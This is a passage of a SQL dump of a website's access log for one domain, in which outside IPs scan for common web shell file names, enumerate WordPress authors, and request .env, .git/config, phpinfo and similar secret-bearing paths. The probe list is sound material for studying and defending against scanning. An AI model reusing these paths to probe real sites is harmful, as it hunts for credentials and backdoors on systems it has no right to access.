06:39:54'),(6759,'https://amb18b.com/13.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:56','2025-11-14 06:39:56'),(6760,'https://amb18b.com/yasnu.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:58','2025-11-14 06:39:58'),(6761,'https://amb18b.com/trd.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:59','2025-11-14 06:39:59'),(6762,'https://amb18b.com/oiepfuav.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:01','2025-11-14 06:40:01'),(6763,'https://amb18b.com/02.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:03','2025-11-14 06:40:03'),(6764,'https://amb18b.com/file2.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:05','2025-11-14 06:40:05'),(6765,'https://amb18b.com/makeasmtp.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:07','2025-11-14 06:40:07'),(6766,'https://amb18b.com/upload.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:08','2025-11-14 06:40:08'),(6767,'https://amb18b.com/btufulhs.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:10','2025-11-14 06:40:10'),(6768,'https://amb18b.com/ant.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:12','2025-11-14 06:40:12'),(6769,'https://amb18b.com/bb5.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:14','2025-11-14 06:40:14'),(6770,'https://amb18b.com/akc.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:16','2025-11-14 06:40:16'),(6771,'https://amb18b.com/s.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:18','2025-11-14 06:40:18'),(6772,'https://amb18b.com/yzkvrell.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:20','2025-11-14 06:40:20'),(6773,'https://amb18b.com/gmo.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:22','2025-11-14 06:40:22'),(6774,'https://amb18b.com/zc-749.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:24','2025-11-14 06:40:24'),(6775,'https://amb18b.com/.well-known/fm.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:26','2025-11-14 06:40:26'),(6776,'https://amb18b.com/ava.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:28','2025-11-14 06:40:28'),(6777,'https://amb18b.com/nqsa.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:30','2025-11-14 06:40:30'),(6778,'https://amb18b.com/2020.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:32','2025-11-14 06:40:32'),(6779,'https://amb18b.com/rak.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:34','2025-11-14 06:40:34'),(6780,'https://amb18b.com/bypass.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:36','2025-11-14 06:40:36'),(6781,'https://amb18b.com/zr.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:38','2025-11-14 06:40:38'),(6782,'https://amb18b.com/wander.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:40','2025-11-14 06:40:40'),(6783,'https://amb18b.com/lock360.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:42','2025-11-14 06:40:42'),(6784,'https://amb18b.com/great.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:43','2025-11-14 06:40:43'),(6785,'https://amb18b.com/fifii.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:45','2025-11-14 06:40:45'),(6786,'https://amb18b.com/12.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:47','2025-11-14 06:40:47'),(6787,'https://amb18b.com/efile.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:49','2025-11-14 06:40:49'),(6788,'https://amb18b.com/past1.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:52','2025-11-14 06:40:52'),(6789,'https://amb18b.com/7.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:54','2025-11-14 06:40:54'),(6790,'https://amb18b.com/4563.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:56','2025-11-14 06:40:56'),(6791,'https://amb18b.com/re.php','13.74.149.244','Direct Access',1,'2025-11-14 06:40:58','2025-11-14 06:40:58'),(6792,'https://amb18b.com/up.php','13.74.149.244','Direct Access',1,'2025-11-14 06:41:00','2025-11-14 06:41:00'),(6793,'https://amb18b.com/35.php','13.74.149.244','Direct Access',1,'2025-11-14 06:41:02','2025-11-14 06:41:02'),(6794,'https://amb18b.com/witm.php','13.74.149.244','Direct Access',1,'2025-11-14 06:41:03','2025-11-14 06:41:03'),(6795,'https://amb18b.com/atomlib.php','13.74.149.244','Direct Access',1,'2025-11-14 06:41:05','2025-11-14 06:41:05'),(6796,'https://amb18b.com/bless2.php','13.74.149.244','Direct Access',1,'2025-11-14 06:41:07','2025-11-14 06:41:07'),(6797,'https://amb18b.com/new4.php','13.74.149.244','Direct Access',1,'2025-11-14 06:41:08','2025-11-14 06:41:08'),(6798,'https://amb18b.com/wsr2.php','13.74.149.244','Direct Access',1,'2025-11-14 06:41:10','2025-11-14 06:41:10'),(6799,'https://amb18b.com/shlo.php','13.74.149.244','Direct Access',1,'2025-11-14 06:41:12','2025-11-14 06:41:12'),(6800,'https://amb18b.com/CLA.php','13.74.149.244','Direct Access',1,'2025-11-14 06:41:13','2025-11-14 06:41:13'),(6801,'https://amb18b.com/kill-9-1.php','13.74.149.244','Direct Access',1,'2025-11-14 06:41:15','2025-11-14 06:41:15'),(6802,'https://amb18b.com/index.php?author=2','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:04','2025-11-14 06:48:04'),(6803,'https://amb18b.com/index.php?author=3','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:06','2025-11-14 06:48:06'),(6804,'https://amb18b.com/index.php?author=4','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:08','2025-11-14 06:48:08'),(6805,'https://amb18b.com/index.php?author=5','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:09','2025-11-14 06:48:09'),(6806,'https://amb18b.com/index.php?author=6','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:11','2025-11-14 06:48:11'),(6807,'https://amb18b.com/index.php?author=7','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:13','2025-11-14 06:48:13'),(6808,'https://amb18b.com/index.php?author=8','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:15','2025-11-14 06:48:15'),(6809,'https://amb18b.com/index.php?author=9','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:16','2025-11-14 06:48:16'),(6810,'https://amb18b.com/index.php?author=10','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:19','2025-11-14 06:48:19'),(6811,'https://amb18b.com/index.php?author=11','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:20','2025-11-14 06:48:20'),(6812,'https://amb18b.com/index.php?author=12','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:22','2025-11-14 06:48:22'),(6813,'https://amb18b.com/index.php?author=13','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:24','2025-11-14 06:48:24'),(6814,'https://amb18b.com/index.php?author=14','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:26','2025-11-14 06:48:26'),(6815,'https://amb18b.com/index.php?author=15','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:27','2025-11-14 06:48:27'),(6816,'https://amb18b.com/index.php?author=16','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:29','2025-11-14 06:48:29'),(6817,'https://amb18b.com/index.php?author=17','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:31','2025-11-14 06:48:31'),(6818,'https://amb18b.com/index.php?author=18','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:32','2025-11-14 06:48:32'),(6819,'https://amb18b.com/index.php?author=19','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:34','2025-11-14 06:48:34'),(6820,'https://amb18b.com/index.php?author=20','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:36','2025-11-14 06:48:36'),(6821,'https://amb18b.com/index.php?author=21','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:38','2025-11-14 06:48:38'),(6822,'https://amb18b.com/index.php?author=22','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:39','2025-11-14 06:48:39'),(6823,'https://amb18b.com/index.php?author=23','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:41','2025-11-14 06:48:41'),(6824,'https://amb18b.com/index.php?author=24','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:43','2025-11-14 06:48:43'),(6825,'https://amb18b.com/index.php?author=25','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:45','2025-11-14 06:48:45'),(6826,'https://amb18b.com/index.php?author=26','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:46','2025-11-14 06:48:46'),(6827,'https://amb18b.com/index.php?author=27','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:48','2025-11-14 06:48:48'),(6828,'https://amb18b.com/index.php?author=28','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:51','2025-11-14 06:48:51'),(6829,'https://amb18b.com/index.php?author=29','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:52','2025-11-14 06:48:52'),(6830,'https://amb18b.com/index.php?author=30','162.241.127.141','https://amb18b.com',1,'2025-11-14 06:48:54','2025-11-14 06:48:54'),(6831,'https://amb18b.com/.git/config','195.178.110.64','Direct Access',1,'2025-11-14 07:38:38','2025-11-14 07:38:38'),(6832,'https://amb18b.com/.git/config','195.178.110.64','Direct Access',1,'2025-11-14 07:38:39','2025-11-14 07:38:39'),(6833,'https://amb18b.com/.env','78.153.140.222','Direct Access',1,'2025-11-14 09:39:45','2025-11-14 09:39:45'),(6834,'https://amb18b.com/.env','78.153.140.222','Direct Access',1,'2025-11-14 09:39:45','2025-11-14 09:39:45'),(6835,'https://amb18b.com/sendgrid.env','78.153.140.222','Direct Access',1,'2025-11-14 09:39:47','2025-11-14 09:39:47'),(6836,'https://amb18b.com/twilio.env','78.153.140.222','Direct Access',1,'2025-11-14 09:39:49','2025-11-14 09:39:49'),(6837,'https://amb18b.com/sendgrid.env','78.153.140.222','Direct Access',1,'2025-11-14 09:39:49','2025-11-14 09:39:49'),(6838,'https://amb18b.com/api/.env','78.153.140.222','Direct Access',1,'2025-11-14 09:39:50','2025-11-14 09:39:50'),(6839,'https://amb18b.com/twilio.env','78.153.140.222','Direct Access',1,'2025-11-14 09:39:51','2025-11-14 09:39:51'),(6840,'https://amb18b.com/phpinfo/','78.153.140.222','Direct Access',1,'2025-11-14 09:39:51','2025-11-14 09:39:51'),(6841,'https://amb18b.com/api/.env','78.153.140.222','Direct Access',1,'2025-11-14 09:39:52','2025-11-14 09:39:52'),(6842,'https://amb18b.com/phpinfo/','78.153.140.222','Direct Access',1,'2025-11-14 09:39:53','2025-11-14 09:39:53'),(6843,'https://amb18b.com/dev/.env','78.153.140.222','Direct Access',1,'2025-11-14 09:39:54','2025-11-14 09:39:54'),(6844,'https://amb18b.com/app_dev.php/_profiler/phpinfo','78.153.140.222','Direct Access',1,'2025-11-14 09:39:55','2025-11-14 09:39:55'),(6845,'https://amb18b.com/admin/.env','78.153.140.222','Direct Access',1,'2025-11-14 09:39:56','2025-11-14 09:39:56'),(6846,'https://amb18b.com/laravel/.env','78.153.140.222','Direct Access',1,'2025-11-14 09:39:57','2025-11-14 09:39:57'),(6847,'https://amb18b.com/.config.yaml','78.153.140.222','Direct Access',1,'2025-11-14 09:39:59','2025-11-14 09:39:59'),(6848,'https://amb18b.com/backend/.env','78.153.140.222','Direct Access',1,'2025-11-14 09:40:00','2025-11-14 09:40:00'),(6849,'https://amb18b.com/secrets.env','78.153.140.222','Direct Access',1,'2025-11-14 09:40:01','2025-11-14 09:40:01'),(6850,'https://amb18b.com/.env.example','78.153.140.222','Direct Access',1,'2025-11-14 09:40:03','2025-11-14 09:40:03'),(6851,'https://amb18b.com/web/.env','78.153.140.222','Direct Access',1,'2025-11-14 09:40:04','2025-11-14 09:40:04'),(6852,'https://amb18b.com//wp-includes/wlwmanifest.xml','34.11.254.85','Direct Access',1,'2025-11-14 14:00:15','2025-11-14 14:00:15'),(6853,'https://amb18b.com//?author=2','34.11.254.85','Direct Access',1,'2025-11-14 14:00:16','2025-11-14 14:00:16'),(6854,'https://amb18b.com//?author=3','34.11.254.85','Direct Access',1,'2025-11-14 14:00:17','2025-11-14 14:00:17'),(6855,'https://amb18b.com//wp-includes/wlwmanifest.xml','152.42.231.153','Direct Access',1,'2025-11-14 17:22:30','2025-11-14 17:22:30'),(6856,'https://amb18b.com//?author=2','152.42.231.153','Direct Access',1,'2025-11-14 17:22:31','2025-11-14 17:22:31'),(6857,'https://amb18b.com/aa.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:15','2025-11-14 19:00:15'),(6858,'https://amb18b.com/abcd.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:17','2025-11-14 19:00:17'),(6859,'https://amb18b.com/admin.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:18','2025-11-14 19:00:18'),(6860,'https://amb18b.com/cgi-bin/','64.227.138.228','Direct Access',1,'2025-11-14 19:00:19','2025-11-14 19:00:19'),(6861,'https://amb18b.com/edit.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:20','2025-11-14 19:00:20'),(6862,'https://amb18b.com/file.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:22','2025-11-14 19:00:22'),(6863,'https://amb18b.com/flower.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:23','2025-11-14 19:00:23'),(6864,'https://amb18b.com/images/index.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:24','2025-11-14 19:00:24'),(6865,'https://amb18b.com/info.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:25','2025-11-14 19:00:25'),(6866,'https://amb18b.com/NewFile.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:27','2025-11-14 19:00:27'),(6867,'https://amb18b.com/alfa.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:28','2025-11-14 19:00:28'),(6868,'https://amb18b.com/ioxi-o.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:29','2025-11-14 19:00:29'),(6869,'https://amb18b.com/nc4.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:30','2025-11-14 19:00:30'),(6870,'https://amb18b.com/13.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:32','2025-11-14 19:00:32'),(6871,'https://amb18b.com/kk.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:33','2025-11-14 19:00:33'),(6872,'https://amb18b.com/jp.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:34','2025-11-14 19:00:34'),(6873,'https://amb18b.com/403.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:35','2025-11-14 19:00:35'),(6874,'https://amb18b.com/ds.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:37','2025-11-14 19:00:37'),(6875,'https://amb18b.com/xmrlpc.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:38','2025-11-14 19:00:38'),(6876,'https://amb18b.com/about.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:39','2025-11-14 19:00:39'),(6877,'https://amb18b.com/adminfuns.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:40','2025-11-14 19:00:40'),(6878,'https://amb18b.com/asasx.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:42','2025-11-14 19:00:42'),(6879,'https://amb18b.com/autoload_classmap.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:43','2025-11-14 19:00:43'),(6880,'https://amb18b.com/classwithtostring.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:44','2025-11-14 19:00:44'),(6881,'https://amb18b.com/cong.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:45','2025-11-14 19:00:45'),(6882,'https://amb18b.com/file2.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:47','2025-11-14 19:00:47'),(6883,'https://amb18b.com/moon.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:48','2025-11-14 19:00:48'),(6884,'https://amb18b.com/cache.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:49','2025-11-14 19:00:49'),(6885,'https://amb18b.com/axx.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:50','2025-11-14 19:00:50'),(6886,'https://amb18b.com/xleet.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:52','2025-11-14 19:00:52'),(6887,'https://amb18b.com/cgi-bin/xmrlpc.php','64.227.138.228','Direct Access',1,'2025-11-14 19:00:53','2025-11-14 19:00:53'),(6888,'https://amb18b.com/wp/','35.231.202.145','Direct Access',1,'2025-11-14 21:32:29','2025-11-14 21:32:29'),(6889,'https://amb18b.com/old/','35.231.202.145','Direct Access',1,'2025-11-14 21:32:32','2025-11-14 21:32:32'),(6890,'https://amb18b.com/wordpress/','35.231.202.145','Direct Access',1,'2025-11-14 21:32:33','2025-11-14 21:32:33'),(6891,'https://amb18b.com/new/','35.231.202.145','Direct Access',1,'2025-11-14 21:32:34','2025-11-14 21:32:34'),(6892,'https://amb18b.com/blog/','35.231.202.145','Direct Access',1,'2025-11-14 21:32:35','2025-11-14 21:32:35'),(6893,'https://amb18b.com/backup/','35.231.202.145','Direct Access',1,'2025-11-14 21:32:37','2025-11-14 21:32:37'),(6894,'https://amb18b.com/graphql','128.199.182.55','Direct Access',1,'2025-11-14 22:19:12','2025-11-14 22:19:12'),(6895,'https://amb18b.com/api','128.199.182.55','Direct Access',1,'2025-11-14 22:19:14','2025-11-14 22:19:14'),(6896,'https://amb18b.com/api/graphql','128.199.182.55','Direct Access',1,'2025-11-14 22:19:14','2025-11-14 22:19:14'),(6897,'https://amb18b.com/graphql/api','128.199.182.55','Direct Access',1,'2025-11-14 22:19:15','2025-11-14 22:19:15'),(6898,'https://amb18b.com/api/gql','128.199.182.55','Direct Access',1,'2025-11-14 22:19:17','2025-11-14 22:19:17'),(6899,'https://amb18b.com/swagger-ui.html','128.199.182.55','Direct Access',1,'2025-11-14 22:19:17','2025-11-14 22:19:17'),(6900,'https://amb18b.com/swagger/index.html','128.199.182.55','Direct Access',1,'2025-11-14 22:19:18','2025-11-14 22:19:18'),(6901,'https://amb18b.com/swagger/swagger-ui.html','128.199.182.55','Direct Access',1,'2025-11-14 22:19:18','2025-11-14 22:19:18'),(6902,'https://amb18b.com/webjars/swagger-ui/index.html','128.199.182.55','Direct Access',1,'2025-11-14 22:19:19','2025-11-14 22:19:19'),(6903,'https://amb18b.com/swagger.json','128.199.182.55','Direct Access',1,'2025-11-14 22:19:19','2025-11-14 22:19:19'),(6904,'https://amb18b.com/swagger/v1/swagger.json','128.199.182.55','Direct Access',1,'2025-11-14 22:19:19','2025-11-14 22:19:19'),(6905,'https://amb18b.com/v2/api-docs','128.199.182.55','Direct Access',1,'2025-11-14 22:19:21','2025-11-14 22:19:21'),(6906,'https://amb18b.com/v3/api-docs','128.199.182.55','Direct Access',1,'2025-11-14 22:19:21','2025-11-14 22:19:21'),(6907,'https://amb18b.com/api-docs/swagger.json','128.199.182.55','Direct Access',1,'2025-11-14 22:19:22','2025-11-14 22:19:22'),(6908,'https://amb18b.com/api/swagger.json','128.199.182.55','Direct Access',1,'2025-11-14 22:19:23','2025-11-14 22:19:23'),(6909,'https://amb18b.com/@vite/env','128.199.182.55','Direct Access',1,'2025-11-14 22:19:24','2025-11-14 22:19:24'),(6910,'https://amb18b.com/actuator/env','128.199.182.55','Direct Access',1,'2025-11-14 22:19:25','2025-11-14 22:19:25'),(6911,'https://amb18b.com/server','128.199.182.55','Direct Access',1,'2025-11-14 22:19:25','2025-11-14 22:19:25'),(6912,'https://amb18b.com/.vscode/sftp.json','128.199.182.55','Direct Access',1,'2025-11-14 22:19:26','2025-11-14 22:19:26'),(6913,'https://amb18b.com/about','128.199.182.55','Direct Access',1,'2025-11-14 22:19:27','2025-11-14 22:19:27'),(6914,'https://amb18b.com/debug/default/view?panel=config','128.199.182.55','Direct Access',1,'2025-11-14 22:19:28','2025-11-14 22:19:28'),(6915,'https://amb18b.com/v2/_catalog','128.199.182.55','Direct Access',1,'2025-11-14 22:19:29','2025-11-14 22:19:29'),(6916,'https://amb18b.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application','128.199.182.55','Direct Access',1,'2025-11-14 22:19:30','2025-11-14 22:19:30'),(6917,'https://amb18b.com/server-status','128.199.182.55','Direct Access',1,'2025-11-14 22:19:31','2025-11-14 22:19:31'),(6918,'https://amb18b.com/login.action','128.199.182.55','Direct Access',1,'2025-11-14 22:19:32','2025-11-14 22:19:32'),(6919,'https://amb18b.com/_all_dbs','128.199.182.55','Direct Access',1,'2025-11-14 22:19:33','2025-11-14 22:19:33'),(6920,'https://amb18b.com/.DS_Store','128.199.182.55','Direct Access',1,'2025-11-14 22:19:34','2025-11-14 22:19:34'),(6921,'https://amb18b.com/.env','128.199.182.55','Direct Access',1,'2025-11-14 22:19:34','2025-11-14 22:19:34'),(6922,'https://amb18b.com/.git/config','128.199.182.55','Direct Access',1,'2025-11-14 22:19:35','2025-11-14 22:19:35'),(6923,'https://amb18b.com/s/7383e2934313e27363e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties','128.199.182.55','Direct Access',1,'2025-11-14 22:19:36','2025-11-14 22:19:36'),(6924,'https://amb18b.com/config.json','128.199.182.55','Direct Access',1,'2025-11-14 22:19:36','2025-11-14 22:19:36'),(6925,'https://amb18b.com/telescope/requests','128.199.182.55','Direct Access',1,'2025-11-14 22:19:37','2025-11-14 22:19:37'),(6926,'https://amb18b.com/info.php','128.199.182.55','Direct Access',1,'2025-11-14 22:19:37','2025-11-14 22:19:37'),(6927,'https://amb18b.com/register-as-agent/','2a05:d01c:c94:fe00:99cc:254c:7c63:9dbd','Direct Access',1,'2025-11-15 13:21:23','2025-11-15 13:21:23'),(6928,'https://amb18b.com/txets.php','104.234.19.21','Direct Access',1,'2025-11-15 20:48:25','2025-11-15 20:48:25'),(6929,'https://amb18b.com/wp-admin/txets.php','104.234.19.21','Direct Access',1,'2025-11-15 20:48:29','2025-11-15 20:48:29'),(6930,'https://amb18b.com/.env','34.72.248.85','Direct Access',1,'2025-11-15 20:58:16','2025-11-15 20:58:16'),(6931,'https://amb18b.com/wp-admin/css/','213.199.55.196','Invalid Referrer',1,'2025-11-15 21:34:38','2025-11-15 21:34:38'),(6932,'https://amb18b.com/sitemap.xml','106.75.98.180','Direct Access',1,'2025-11-16 00:59:16','2025-11-16 00:59:16'),(6933,'https://amb18b.com/sitemap.xml','106.75.47.91','Direct Access',1,'2025-11-16 00:59:23','2025-11-16 00:59:23'),(6934,'https://amb18b.com/.env','44.223.110.128','Direct Access',2,'2025-11-16 03:46:22','2025-11-16 03:46:07'),(6935,'https://amb18b.com/.env','44.223.110.128','Direct Access',2,'2025-11-16 03:46:25','2025-11-16 03:46:08'),(6936,'https://amb18b.com/.env.bak','44.223.110.128','Direct Access',1,'2025-11-16 03:46:08','2025-11-16 03:46:08'),(6937,'https://amb18b.com/.env.bak','44.223.110.128','Direct Access',1,'2025-11-16 03:46:10','2025-11-16 03:46:10'),(6938,'https://amb18b.com/.env.save','44.223.110.128','Direct Access',2,'2025-11-16 03:46:26','2025-11-16 03:46:10'),(6939,'https://amb18b.com/.env.save','44.223.110.128','Direct Access',2,'2025-11-16 03:46:27','2025-11-16 03:46:12'),(6940,'https://amb18b.com/.env.php','44.223.110.128','Direct Access',2,'2025-11-16 03:46:28','2025-11-16 03:46:13'),(6941,'https://amb18b.com/.env.php','44.223.110.128','Direct Access',2,'2025-11-16 03:46:29','2025-11-16 03:46:14'),(6942,'https://amb18b.com/public/.env','44.223.110.128','Direct Access',1,'2025-11-16 03:46:15','2025-11-16 03:46:15'),(6943,'https://amb18b.com/public/.env','44.223.110.128','Direct Access',1,'2025-11-16 03:46:16','2025-11-16 03:46:16'),(6944,'https://amb18b.com/.env.example','44.223.110.128','Direct Access',1,'2025-11-16 03:46:17','2025-11-16 03:46:17'),(6945,'https://amb18b.com/.env.example','44.223.110.128','Direct Access',1,'2025-11-16 03:46:18','2025-11-16 03:46:18'),(6946,'https://amb18b.com/beta/.env','44.223.110.128','Direct Access',2,'2025-11-16 03:46:30','2025-11-16 03:46:19'),(6947,'https://amb18b.com/beta/.env','44.223.110.128','Direct Access',2,'2025-11-16 03:46:31','2025-11-16 03:46:19'),(6948,'https://amb18b.com/prod/.env','44.223.110.128','Direct Access',2,'2025-11-16 03:46:32','2025-11-16 03:46:20'),(6949,'https://amb18b.com/prod/.env','44.223.110.128','Direct Access',2,'2025-11-16 03:46:33','2025-11-16 03:46:21'),(6950,'https://amb18b.com/env.js','44.223.110.128','Direct Access',1,'2025-11-16 03:46:34','2025-11-16 03:46:34'),(6951,'https://amb18b.com/env.js','44.223.110.128','Direct Access',1,'2025-11-16 03:46:35','2025-11-16 03:46:35'),(6952,'https://amb18b.com/phpinfo','44.223.110.128','Direct Access',1,'2025-11-16 03:46:39','2025-11-16 03:46:39'),(6953,'https://amb18b.com/phpinfo','44.223.110.128','Direct Access',1,'2025-11-16 03:46:41','2025-11-16 03:46:41'),(6954,'https://amb18b.com/phpinfo.php','44.223.110.128','Direct Access',1,'2025-11-16 03:46:42','2025-11-16 03:46:42'),(6955,'https://amb18b.com/phpinfo.php','44.223.110.128','Direct Access',1,'2025-11-16 03:46:42','2025-11-16 03:46:42'),(6956,'https://amb18b.com/.env','35.184.97.117','Direct Access',1,'2025-11-16 07:00:54','2025-11-16 07:00:54'),(6957,'https://amb18b.com/.env','34.9.74.196','Direct Access',1,'2025-11-16 08:00:55','2025-11-16 08:00:55'),(6958,'https://amb18b.com/.env','136.119.95.133','Direct Access',1,'2025-11-16 10:50:37','2025-11-16 10:50:37'),(6959,'https://amb18b.com/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:45:35','2025-11-16 12:45:35'),(6960,'https://amb18b.com/.env.prod','13.40.197.137','Direct Access',1,'2025-11-16 12:45:35','2025-11-16 12:45:35'),(6961,'https://amb18b.com/.env.dev','13.40.197.137','Direct Access',1,'2025-11-16 12:45:35','2025-11-16 12:45:35'),(6962,'https://amb18b.com/.env.local','13.40.197.137','Direct Access',1,'2025-11-16 12:45:35','2025-11-16 12:45:35'),(6963,'https://amb18b.com/.env.staging','13.40.197.137','Direct Access',1,'2025-11-16 12:45:36','2025-11-16 12:45:36'),(6964,'https://amb18b.com/.env.development','13.40.197.137','Direct Access',1,'2025-11-16 12:45:42','2025-11-16 12:45:42'),(6965,'https://amb18b.com/.env.production','13.40.197.137','Direct Access',1,'2025-11-16 12:45:43','2025-11-16 12:45:43'),(6966,'https://amb18b.com/.env~','13.40.197.137','Direct Access',1,'2025-11-16 12:45:43','2025-11-16 12:45:43'),(6967,'https://amb18b.com/.env.backup','13.40.197.137','Direct Access',1,'2025-11-16 12:45:43','2025-11-16 12:45:43'),(6968,'https://amb18b.com/.env.test','13.40.197.137','Direct Access',1,'2025-11-16 12:45:43','2025-11-16 12:45:43'),(6969,'https://amb18b.com/.env.sample','13.40.197.137','Direct Access',1,'2025-11-16 12:45:44','2025-11-16 12:45:44'),(6970,'https://amb18b.com/.env.orig','13.40.197.137','Direct Access',1,'2025-11-16 12:45:45','2025-11-16 12:45:45'),(6971,'https://amb18b.com/.env.tmp','13.40.197.137','Direct Access',1,'2025-11-16 12:45:46','2025-11-16 12:45:46'),(6972,'https://amb18b.com/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:45:46','2025-11-16 12:45:46'),(6973,'https://amb18b.com/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:45:46','2025-11-16 12:45:46'),(6974,'https://amb18b.com/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:45:46','2025-11-16 12:45:46'),(6975,'https://amb18b.com/.env.swp','13.40.197.137','Direct Access',1,'2025-11-16 12:45:46','2025-11-16 12:45:46'),(6976,'https://amb18b.com/admin/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:45:46','2025-11-16 12:45:46'),(6977,'https://amb18b.com/.env.dist','13.40.197.137','Direct Access',1,'2025-11-16 12:45:46','2025-11-16 12:45:46'),(6978,'https://amb18b.com/app/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:45:56','2025-11-16 12:45:56'),(6979,'https://amb18b.com/admin/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:45:56','2025-11-16 12:45:56'),(6980,'https://amb18b.com/admin/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:45:56','2025-11-16 12:45:56'),(6981,'https://amb18b.com/app/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:45:56','2025-11-16 12:45:56'),(6982,'https://amb18b.com/app/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:45:56','2025-11-16 12:45:56'),(6983,'https://amb18b.com/api/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:45:56','2025-11-16 12:45:56'),(6984,'https://amb18b.com/admin/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:45:56','2025-11-16 12:45:56'),(6985,'https://amb18b.com/api/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:45:56','2025-11-16 12:45:56'),(6986,'https://amb18b.com/api/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:45:57','2025-11-16 12:45:57'),(6987,'https://amb18b.com/api/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:45:57','2025-11-16 12:45:57'),(6988,'https://amb18b.com/config/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:45:57','2025-11-16 